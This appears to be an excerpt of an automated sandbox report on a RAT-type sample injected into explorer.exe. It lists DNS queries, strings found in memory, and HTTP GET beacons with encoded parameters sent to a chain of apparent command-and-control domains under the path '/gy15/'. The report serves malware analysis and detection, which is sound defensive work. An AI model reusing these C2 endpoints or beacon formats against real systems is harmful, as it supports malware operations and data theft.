Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 9_2_0E396F82 getaddrinfo,setsockopt,recv,

9_2_0E396F82

Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=Y/N4KrVAXY1kocpgzu8WnG77ol+AHv4xLUA59fG9L70w7yqxHWlTkc1yvlLlDHtztMKBj2yhyA==&hL08qP=ojn0sl HTTP/1.1Host: www.dandevonald.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=ojuzNIgvg1BwHmAcToIecm58HYsz0PWD/adWnxcLSOv/0CtFh7ct+QMG65Nx8hG2JCp7w1BwJA==&hL08qP=ojn0sl HTTP/1.1Host: www.carmen-asa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl HTTP/1.1Host: www.rs-alohafactorysaleuua.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.dandevonald.com
Source: global traffic	DNS traffic detected: DNS query: www.carmen-asa.com
Source: global traffic	DNS traffic detected: DNS query: www.rs-alohafactorysaleuua.shop
Source: global traffic	DNS traffic detected: DNS query: www.tqqft8l5.xyz
Source: global traffic	DNS traffic detected: DNS query: www.jwoalhbn.xyz
Source: global traffic	DNS traffic detected: DNS query: www.99812.photos
Source: global traffic	DNS traffic detected: DNS query: www.20allhen.online
Source: global traffic	DNS traffic detected: DNS query: www.ttyijlaw.com
Source: global traffic	DNS traffic detected: DNS query: www.incrediblyxb.christmas
Source: global traffic	DNS traffic detected: DNS query: www.dunia188j.store
Source: global traffic	DNS traffic detected: DNS query: www.midsouthhealthcare.com
Source: global traffic	DNS traffic detected: DNS query: www.286live.com

Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000009.00000002.4572315020.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2145350381.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2145316957.0000000007B50000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158150951.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, KfYvtUBOq.exe, 00000008.00000002.2186011893.0000000002D96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.online
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.online/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.online/gy15/www.ttyijlaw.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.onlineReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.com/gy15/www.vivehogar.net
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photos
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photos/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photos/gy15/www.20allhen.online
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photosReferer:
Source: explorer.exe, 00000009.00000003.2980175213.000000000C406000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980659407.000000000C40C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979452129.000000000C3F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2160546176.000000000C3F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.com/gy15/www.rs-alohafactorysaleuua.shop
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.com/gy15/www.carmen-asa.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.store
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.store/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.store/gy15/www.midsouthhealthcare.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.storeReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas
Source: explorer.exe, 00000009.00000002.4590979961.0000000010DDF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000564F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas/:80gy15?RzuTsp=0BfZhhXj03xBTAibP1YuAxS
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas/gy15/www.dunia188j.store
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmasReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.com/gy15/www.mariaslakedistrict.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyz/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyz/gy15/www.99812.photos
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyzReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.com/gy15/www.oiupa.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.com/gy15/www.286live.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oiupa.xyz
Source: explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oiupa.xyz/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oiupa.xyzReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shop
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shop/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shop/gy15/www.tqqft8l5.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shopReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyz/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyz/gy15/www.jwoalhbn.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyzReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.com/gy15/www.incrediblyxb.christmas
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.net
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.net/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.net/gy15/www.insurancebygarry.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.netReferer:
Source: explorer.exe, 00000009.00000003.2979149239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2154297535.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000009.00000000.2160546176.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000009.00000000.2160546176.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000003.2979149239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2154297535.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075211732.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
